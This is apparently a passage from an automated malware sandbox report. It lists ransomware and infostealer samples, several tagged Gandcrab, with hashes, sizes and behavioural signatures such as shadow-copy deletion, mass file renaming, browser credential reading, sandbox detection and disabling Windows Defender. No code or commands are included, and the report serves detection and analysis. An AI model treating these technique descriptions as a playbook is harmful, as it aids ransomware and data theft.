      89861ebe63d42d099b751f84bbe7a7b37a363d178e73a6467cbffbaa2ae99167f81cfe3695b64fa124a7fd74097ab568a3f4e2a64a4fac0ef0a6b1e9d3fc943e

    • SSDEEP

      3072:GdDlBBfTiNcKwLQ2zZE99VYvUcT0mPqkaYc+dv+Ld4NTJnLOXJKYlEQqMRiPVHUc:K3EAqkhc+1bLxdxMR0VHT9GHq

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (281) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      729f51d9a39f87c71d4f3fdc6ff811f953c9de16d769cb2b290128fe9d4e7532.exe

    • Size

      111KB

    • MD5

      bff182346d47cb63a14d57c20775ca52

    • SHA1

      3c095f73b9e5155ab9d08496909a9344c86a0da7

    • SHA256

      729f51d9a39f87c71d4f3fdc6ff811f953c9de16d769cb2b290128fe9d4e7532

    • SHA512

      d241a3b33abd867dce860651217bf0d19d9a2e59bb4f8995ab0910333e5317e166b7ce21b319cc0ffde76c640395570c7baeecd4d662e2dcbcdda46bed2570fe

    • SSDEEP

      3072:4jsU4kcPBbaCcsKsraOkWo86d5TEi9fh40EZl0:04kuRaVzQ7SQi95p

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Target

      72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b.exe

    • Size

      268KB

    • MD5

      4e2b58f99ad9f13c2b09f0741739775d

    • SHA1

      6a51d0cd9ea189babad031864217ddd3a7ddba84

    • SHA256

      72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b

    • SHA512

      dd74f94fbe6324410e832ab22b2807bbc5bc4171704477898a2b64a1ce6a7b3a289a4fb399412152b33a6b286e439c8d89eca4d5cba7bcd65dcb864e18487ebd

    • SSDEEP

      3072:gfLB0w+Wv5pa/Dc/nuOL23e8aoeE+aqfnfj59AEYfzaBUGm+0lh831QPfrwV6cFK:+TgenuOLCL+559AEq+m+jmEIcFaNtN

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (8610) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Deletes itself

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Drops desktop.ini file(s)

    • Suspicious use of SetThreadContext

    • Target

      74ec6fffadcf1771b04dc4fce45f21438e246ac62c1a26d566be68591f6bfd7a.exe

    • Size

      169KB

    • MD5

      aa98b4d3b2f7fdbe2a90df0a8e6c0bde

    • SHA1

      19c84fc638754e0123efc47df31696ca2acfda7f

    • SHA256

      74ec6fffadcf1771b04dc4fce45f21438e246ac62c1a26d566be68591f6bfd7a

    • SHA512

      128fe9a14f2d9d4655a56089a7cb26b28d7d0423412e6d677ae29dbc7eacda99f6c8788e443d2ee6264ab0a25a05f98381d5042447ae1b9269b98fcefe39267a

    • SSDEEP

      3072:Qpd5kyqA/BIkrL0kMZ2m7ksIS/bUctF2F1:QNkQ/BIkf0V27sFbUctF2F

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (271) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      7cf39ebb4409b13a7c153abff6661cc4d28d8d7109543d6419438ac9f2f1be57.exe

    • Size

      443KB

    • MD5

      fd5ae61959c9590036881cb809891029

    • SHA1

      f930d520913b407ab3cb5d7ecf5ee2a7dca1c071

    • SHA256

      7cf39ebb4409b13a7c153abff6661cc4d28d8d7109543d6419438ac9f2f1be57

    • SHA512

      2feb832498370c7635d42913a4328b3ba797e67cf6f7cdadc769dd549b251b05f340899229fcf76ccc1f8fe5d1512d769f581079ac06c6459669d536ba1c1fbb

    • SSDEEP

      6144:I9LJ4d2DvM1V4LKPx7WlkJhW0lNVel9zXAjqiORKmb+Ylr48ov/P:IIdBrSKPx+T597iOMOTh48ov

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Modifies boot configuration data using bcdedit

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Drops file in System32 directory

    • Sets desktop wallpaper using registry

    • Target

      85110c71485fa6b2e79ff0bf5562ab8367e7ca0f31ee27d96ccc9171bd94c7d3.exe

    • Size

      490KB

    • MD5

      fbc52bacf2a9cf126ef406ed1d1dbfa6

    • SHA1

      8638cd625af218e16e5cfc8153efb5b058b78845

    • SHA256

      85110c71485fa6b2e79ff0bf5562ab8367e7ca0f31ee27d96ccc9171bd94c7d3

    • SHA512

      94f39c321d27a1fd515d78e0050417959d067e97c34e1a3c26b7d359f75d8cbeafbf0b16ae6a750b3c78726c16fabd2d282eda74efebe76e81184723d6271352

    • SSDEEP

      12288:Yutrzh9xOXojrUymULpA3mxW7tOmg696UXjoA9GMvWToEJeN:Yutr5OYjjmUdymg0gzbgHo5

    • Modifies Windows Defender Real-time Protection settings

    • Modifies security service

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Boot or Logon Autostart Execution: Active Setup

      Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    • Disables taskbar notifications via registry modification

    • Event Triggered Execution: Image File Execution Options Injection

    • Sets service image path in registry

    • Stops running service(s)

    • Executes dropped EXE

    • Loads dropped DLL

    • Drops desktop.ini file(s)

    • Target

      8d2b0cf8ad5948bd2267aca64600d7e9d45b4dc8ad6a300d5d3c029bd003220d.exe

    • Size

      92KB

    • MD5

      50f138dfaad27ff53d8f69352c25e770

    • SHA1

      a8267267a71db76301c09b146dcd0ad1fe5195fd

    • SHA256

      8d2b0cf8ad5948bd2267aca64600d7e9d45b4dc8ad6a300d5d3c029bd003220d

    • SHA512

      b01e39cc2374206ea1d1b7a24896fcac646d189fdf5e6369e9327635a5b7e0b6206096d6bc7c548c8a94915006e73553d686a9b7824af614da3600df7aa58bda

    • SSDEEP

      1536:p7mqIEF7ivk6miU9ffYm4SeSwvGJlUFYfK7csKsraOkWo8XKlH+ymmfAsLASAq:Mvgivw9wBaGcsKsraOkWo86lHB9fxLA5

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Target

      9001d3e08e34598061281c2187b4deeee8022081f4706e9b7b89d52244ccf426.exe

    • Size

      410KB

    • MD5

      f660796e27a752ba6037ee68f44b29d4

    • SHA1

      dcd5a2ac5bae36bacb4b3ce15b63b5af3c4c9d33

    • SHA256

      9001d3e08e34598061281c2187b4deeee8022081f4706e9b7b89d52244ccf426

    • SHA512

      d8219d64b9d576308b0a2a44cf1bd22ec2973fdee4b775c6dc38689a39772468acd2fec2d8b50ad8d8925f8f14ae9722dcc2ca74f1b50eb74851590acea0daaf

    • SSDEEP

      6144:wZOmcTK/WkW0PwFgRfqPKbmZq3f2GaYoccionP0+nwWjn:xmcT44FgRSSKZeSc1ocKxjn

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (302) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      92aa0505ed000f9c5e54313506e3ebd0f1ae37628003a1275e302f6769bdf5f0.exe

    • Size

      197KB

    • MD5

      d5af92ab973f641a23df5d0f955a4854

    • SHA1

      e99e0b35c6672b15cd2cb927d8462609fd6e9067

    • SHA256

      92aa0505ed000f9c5e54313506e3ebd0f1ae37628003a1275e302f6769bdf5f0

    • SHA512

      96fededa28ff7918aae0ef83463384b55ba2b7e146d78c7f2557a5e4218181de7abf4c3a2ff0dba6822cfc983e92af8e9fc50698a20c69daff0fa79e1094ba6a

    • SSDEEP

      3072:j4iTqLw4MdVql02+btqf1y3SCbFOg580+ZXEhkUy3j6aviwK+CRXs5F89B:8iWLPmVqll+8fWSkO90+Z593j6OiwwD

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (267) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      9d081b734c595a1ae38e254369c0060c5870ee119c9f7853989c23ebc204a291.exe

    • Size

      24KB

    • MD5

      8a1225f47aa9f0673c32983f1b2b2c5b

    • SHA1

      742f2364f2d5f10385b56c22ecf17a3cdcc53346

    • SHA256

      9d081b734c595a1ae38e254369c0060c5870ee119c9f7853989c23ebc204a291

    • SHA512

      d633dc2caa28a0a782108b9d47d43322c6f1d95c82903219b4b83eb491691217916e7eee35a0eb206aae2937523896e538141e524b396c2ae7210ec8f8238827

    • SSDEEP

      96:/lx5KHYFNV+Vvl/iABo1FYXGgn2PUkWf2BtvXrs2aoE8y79h9jSUyrW9EhN:/TzmVvl/vaKdnvJeBtvXrsr352UyCEh

    Score
    4/10
    • Target

      9e288f3839546e5c382c6b3ccc1516a6bf797ad188107534a18eb6e4203117c7.exe

    • Size

      42KB

    • MD5

      e7b365fbcce1ea6c057bf8d3c06c2879

    • SHA1

      4b66fc1e7b48d2c3b35c07fc5ce8173b039016a3

    • SHA256

      9e288f3839546e5c382c6b3ccc1516a6bf797ad188107534a18eb6e4203117c7

    • SHA512

      cbf80afc11763e0861da5d30571f1d5f4975cb511abc49b9ddbecb7a906d65e5066e626aef089157e22e880da32ed8968825ca7cd859cd0364c9acc33453cdd7

    • SSDEEP

      768:mXlsdclumB/3GWK1Bmf/gsAyIpv6G/3PM17GhWy:gMclnKPmfu/

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Drops file in System32 directory

    • Target

      9e87f069de22ceac029a4ac56e6305d2df54227e6b0f0b3ecad52a01fbade021.exe

    • Size

      338KB

    • MD5

      bbd4c2d2c72648c8f871b36261be23fd

    • SHA1

      77c525e6b8a5760823ad6036e60b3fa244db8e42

    • SHA256

      9e87f069de22ceac029a4ac56e6305d2df54227e6b0f0b3ecad52a01fbade021

    • SHA512

      38f2ff3b7ff6faa63ef0a3200e0dbb9e48e1d404a065f6919cb6d245699479896a42316f299c33c8cc068922934c64f8aa06c88b000d1676870c1d0c0f18e14a

    • SSDEEP

      6144:zUrigyvF8Q9fLglQ8t0qabFDfOdQ/LDA8H+wwaMZUUAOq+mwNf8fsS+:zUrigY8QBLg9t0qabFDGdQ/TlYiUQ+Vz

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Enumerates VirtualBox registry keys

    • Looks for VirtualBox Guest Additions in registry

    • Renames multiple (169) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Deletes itself

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Sets desktop wallpaper using registry

    • Target

      9f01f1a042c48b0e51f5e6029a661f5f08aad6ca0912a1b444afac6f2d4f2ad2.exe

    • Size

      137KB

    • MD5

      90c3d889324a93c1c90f05fd63597dae

    • SHA1

      1f5bc404738304231485054c6586a5036816e95e

    • SHA256

      9f01f1a042c48b0e51f5e6029a661f5f08aad6ca0912a1b444afac6f2d4f2ad2

    • SHA512

      fbaf6261b8b5596b03eddcebaa54bf4e44753878026adf969847fb25738013a6436a40da8577f2de5e5c15cc7c74a37115b454445ecaa778fec7e8588c4c3455

    • SSDEEP

      3072:gMmgyo3o4+2YK7b21Tve+Owhm0ewGbAFv:gMmgyo3o0YK7bATvxOwsbG

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Modifies boot configuration data using bcdedit

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Drops file in System32 directory

    • Sets desktop wallpaper using registry

    • Target

      a7b82203fa6a1831100fd414a5ef599edfbc72e63e34fc9847dd4e96c0bac64f.exe

    • Size

      45KB

    • MD5

      efdeebc05e7cfee5a07fa3dd7ab20e1f

    • SHA1

      b1c23a7a399e24cb27213c5efca15cfba8baff06

    • SHA256

      a7b82203fa6a1831100fd414a5ef599edfbc72e63e34fc9847dd4e96c0bac64f

    • SHA512

      261d489b6637751ca6eda5e6702d8e1d38028314cf4f7899951cafa59fa7a0e5f2021eab6bcf42b006a2515c0ce5e811a06e96aae6a2c5db10225a2450114e5d

    • SSDEEP

      768:DPphueH/BQLusoLpaXAMUPfktNLcVxdlupCuEkOWASuoeimtO4w8q8B3A:DPpB1soLpaQ/nymvH7W/feLtLB3A

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      b5a2fe5b87deed18b789929faaa7601771de63dfe6a670d09224aa57ebe8c6b9.exe

    • Size

      168KB

    • MD5

      d1c616cf0fd1eb61164e9091cad354c5

    • SHA1

      444539834e496f04cf9c07594645ca252f3b52a8

    • SHA256

      b5a2fe5b87deed18b789929faaa7601771de63dfe6a670d09224aa57ebe8c6b9

    • SHA512

      441477d5a429dad3e499e943c8dfb54ad673320eed81f4fec00b3798839b3bb296c446354d5e1f46ec52aa278417011ab8ae7f374df1347e341e46243276af00

    • SSDEEP

      3072:B36NS6YsVsI11Tl2JD5wMPm+RY8RvPCdSGk8RQcj2Er:B3H6TsuzYGMgWcSE

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (275) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      cf0fe3723a41d7105f5b6d8a1be3ef6d43135c96714ffcb2c19d8a9ad9021c36.exe

    • Size

      169KB

    • MD5

      fb6fc3f65a53371756e4806bb5b1ce88

    • SHA1

      4a3f16f710b8732ac769f66bca4292220d1c045a

    • SHA256

      cf0fe3723a41d7105f5b6d8a1be3ef6d43135c96714ffcb2c19d8a9ad9021c36

    • SHA512

      b7541b5ae16e91565d4f8041e2f416f3c3f065c5f7b0b187aa81c5f7a1af5bef75342f382a7a0cba12732f301e872d5758c0ae7b61657a8bcab141b3f1db4adc

    • SSDEEP

      3072:/fCjdqA19PzcD28y+IDN8FPguf/I2KbnehQpSEymq9Gs6c/R7b3doBHpT0FFH8Yc:iCIh8dlf/I2K7OQp/ymns6U7b3CsOOFO

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (294) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe

    • Size

      89KB

    • MD5

      e3b25f81f0a21cfcda2848897c3734fd

    • SHA1

      1e068334dd9a1b73dc4491cabbcfe2ce31579ee0

    • SHA256

      cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435

    • SHA512

      395ad7858574dbfa819d451194245099c6e6a129e9369ae1ff16b323e5918cf4f81467edef674494e0b128a650c6693e44bd9de2fb319bf8c7bf024b10e6bd39

    • SSDEEP

      1536:x4B3t0KkhodqWUpJ6pPMxTl4YKRPu7/dgEOTvezuKtlx7D34nIsgf+YziT9pwqlq:xM5k6qWFvYKRPIgEOTveDnx7Don76+Yr

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Modifies boot configuration data using bcdedit

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Drops file in System32 directory

    • Sets desktop wallpaper using registry

    • Target

      f95b6a45f1ae3b4ddf74fcc2f193a0a25df6f272b722e5c29edc838a99180061.exe

    • Size

      220KB

    • MD5

      75795c8ef2b35b12e73305c32b010e84

    • SHA1

      17bf9c32f3920ea9ed3614c0a067cf07d4419ba8

    • SHA256

      f95b6a45f1ae3b4ddf74fcc2f193a0a25df6f272b722e5c29edc838a99180061

    • SHA512

      aafd5f6d72405c71093d9e0649f7923a4325af6faf381af0da1f66c49e194b98cc7cb80cfb29dcba8b5bda5e80f5124a0f908d90a406d79025e0fa2f2ad5570b

    • SSDEEP

      6144:eVDC9bGASz7+OeO+OeN7VBBhhBBNu1IFksAOTRGC2Bu:e0KAS+OeO+OeNhBBhhBBN0IFksL

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (9821) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Deletes itself

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Drops desktop.ini file(s)

    • Target

      fd49914f47d9ed24fe475c263a32b34d9ed9e472379ede30530a4a3c64510d24.exe

    • Size

      188KB

    • MD5

      6f6be02547e9365d2ca5173dc8e5201a

    • SHA1

      ffb1b17d0b3d3fe71b250cad13b2371f5e4f0452

    • SHA256

      fd49914f47d9ed24fe475c263a32b34d9ed9e472379ede30530a4a3c64510d24

    • SHA512

      65b5224240e62ef405f86ce678e94f62953af0fc89cebf6d2457f675adb2f58d007953b9a654f01c66f1c87bcc4d66bbb8585aa66acfbce51334cf6202d4254d

    • SSDEEP

      3072:7dIDN8FPguf/I2KbnehQpSEymq9Gs6c/R7b3doBHZT0FFH8MubkJ8wo1:xIh8dlf/I2K7OQp/ymns6U7b3C8ObGo1

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (302) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

MITRE ATT&CK Enterprise v15

Tasks

static1

upx
Score
7/10

behavioral1

spyware, stealer
Score
7/10

behavioral2

spyware, stealer, upx
Score
7/10

behavioral3

gandcrab, backdoor, defense_evasion, execution, impact, ransomware, spyware, stealer
Score
10/10

behavioral4

spyware, stealer, upx
Score
7/10

behavioral5

Score
3/10

behavioral6

spyware, stealer, upx
Score
7/10

behavioral7

persistence, ransomware
Score
9/10

behavioral8

ransomware, spyware, stealer
Score
9/10

behavioral9

Score
1/10

behavioral10

gandcrab, backdoor, defense_evasion, execution, impact, ransomware, spyware, stealer
Score
10/10

behavioral11

persistence, ransomware
Score
9/10

behavioral12

gandcrab, backdoor, defense_evasion, execution, impact, ransomware, spyware, stealer
Score
10/10

behavioral13

spyware, stealer
Score
7/10

behavioral14

defense_evasion, execution, impact, persistence, ransomware, spyware, stealer
Score
9/10

behavioral15

gandcrab, backdoor, defense_evasion, execution, impact, ransomware, spyware, stealer
Score
10/10

behavioral16

defense_evasion, evasion, execution, impact, persistence, ransomware, spyware, stealer
Score
10/10

behavioral17

defense_evasion, evasion, execution, impact, persistence, ransomware, trojan
Score
10/10

behavioral18

spyware, stealer
Score
7/10

behavioral19

gandcrab, backdoor, defense_evasion, execution, impact, ransomware, spyware, stealer
Score
10/10

behavioral20

gandcrab, backdoor, defense_evasion, execution, impact, ransomware, spyware, stealer
Score
10/10

behavioral21

Score
4/10

behavioral22

spyware, stealer
Score
7/10

behavioral23

defense_evasion, evasion, execution, impact, ransomware, spyware, stealer
Score
10/10

behavioral24

defense_evasion, evasion, execution, impact, persistence, ransomware, spyware, stealer
Score
10/10

behavioral25

spyware, stealer, upx
Score
7/10

behavioral26

gandcrab, backdoor, defense_evasion, execution, impact, ransomware, spyware, stealer
Score
10/10

behavioral27

gandcrab, backdoor, defense_evasion, execution, impact, ransomware, spyware, stealer
Score
10/10

behavioral28

defense_evasion, evasion, execution, impact, persistence, ransomware, spyware, stealer
Score
10/10

behavioral29

defense_evasion, execution, impact, ransomware, spyware, stealer
Score
9/10

behavioral30

gandcrab, backdoor, defense_evasion, execution, impact, ransomware, spyware, stealer
Score
10/10